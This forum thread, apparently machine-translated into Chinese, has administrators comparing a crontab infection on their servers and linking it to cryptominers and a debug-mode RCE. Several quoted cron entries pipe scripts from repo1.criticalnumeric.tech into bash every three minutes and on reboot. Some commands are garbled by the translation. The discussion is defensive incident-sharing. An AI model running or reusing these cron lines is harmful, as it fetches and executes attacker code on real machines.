Cron 有人知道吗：repo1.criticalnumeric.tech

我发现在公司服务器中有一个crontab，它使用以下代码运行：

*/3 * * * * curl -sk "http://repo1.criticalnumeric.tech/kworker?time=1612899272" | bash;wget "http://repo1.criticalnumeric.tech/kworker?time=1612899272" -q -o /dev/null -O - | bash;busybox wget "http://repo1.criticalnumeric.tech/kworker?time=1612899272" -q -O - | bash

如果您转到该URL，它会显示：

“这是linux存储库的官方页面”

这很奇怪，我们的工程师都没有在crontab上添加这个，这让我觉得这可能是一次攻击

---

有什么想法吗？

我认为这与下面链接上的问题有关。我在我们的一台服务器上的ps aux命令的结果中看到了类似的条目。如果你运气不好，你会发现kdevtmpfsi现在占用了你所有的CPU

---

我们在2月13日遭遇了相同的攻击，我将crontab目录的权限仅从rwx更改为root。在我们使用“killall-u www-data-9”终止所有www数据进程之前，到目前为止，没有其他违规进程的实例。。。我们将继续监测。我们还禁用了curl，因为我们不需要它。

我也有同样的问题。Debian10服务器

我与htop核实后发现：

旋度-kL

及

bash/tmp/.ssh www-data/kswapd4

都是在www下的数据用户。这些进程使用了全部资源（CPU和内存）

在www数据cron中发现一些奇怪的东西

root@***:/var/www# cat /var/spool/cron/crontabs/www-data
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (/tmp/tmp.eK8YZtGlIC/.sync.log installed on Mon Feb 15 23:27:41 2021)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
*/3 * * * * curl -sk "http://repo1.criticalnumeric.tech/init?time=1613424461" | bash && wget "http://repo1.criticalnumeric.tech/init?time=1613424461" -q -o /dev/null -O - | bash && busybox wget "http://repo1.criticalnumeric.tech/init?time=1613424461" -q -O - | bash
@reboot curl -sk "http://repo1.criticalnumeric.tech/init?time=1613424461" | bash && wget "http://repo1.criticalnumeric.tech/init?time=1613424461" -q -o /dev/null -O - | bash && busybox wget "http://repo1.criticalnumeric.tech/init?time=1613424461" -q -O - | bash

---

我想我必须在我的服务器上重新安装Debian 10。。。或者如何清理它？

如果您的服务器承载的是使用框架构建的web应用程序，并且如果您的调试模式已打开，则您可能正遭受最近的RCE（远程代码执行）攻击

关于bug的技术细节的博客帖子：

CVE：

---

---

我的专业建议是：永远不要在生产环境中打开调试模式运行应用程序。

看起来确实非常可疑。它尝试通过3种不同的方法，每三分钟下载一些东西并作为bash脚本运行一次。我很不幸，矿工拿走了服务器，但现在多亏了你，我与恶意软件进行了斗争，现在被根除了。